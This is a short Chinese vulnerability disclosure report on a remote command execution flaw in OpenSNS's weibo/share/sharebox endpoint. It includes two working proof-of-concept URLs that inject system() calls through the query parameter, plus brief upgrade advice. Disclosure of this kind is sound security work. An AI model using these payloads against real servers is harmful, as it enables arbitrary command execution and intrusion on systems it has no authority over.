漏洞说明:
opensns综合性社交软件系统远程命令执行高危漏洞,该漏洞是由于漏洞入口在 weibo/share/sharebox,通过 get请求提交query参数,存在变量覆盖,可能导致攻击者通过漏洞发送特定的请求包执行任意命令。
漏洞复现:
1.资产归属证明
通过鹰图平台发现xx.xx.com归属于xxx有限公司,如同所示:
2. 利用poc
/index.php?s=weibo/Share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26id[status]=1%26id[method]=Schedule->_validationFieldItem%26id[4]=function%26[6][]=%26id[0]=cmd%26id[1]=assert%26id[args]=cmd=system(ipconfig)
可以执行cmd命令ipconfig,或修改括号里任意命令如:dir、phpinfo()、netstat等。证明漏洞存在,如下图所示:
/index.php?s=weibo/Share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26id[status]=1%26id[method]=Schedule->_validationFieldItem%26id[4]=function%26[6][]=%26id[0]=cmd%26id[1]=assert%26id[args]=cmd=system(phpinfo())
3.修复建议
根据官方升级包,进行升级。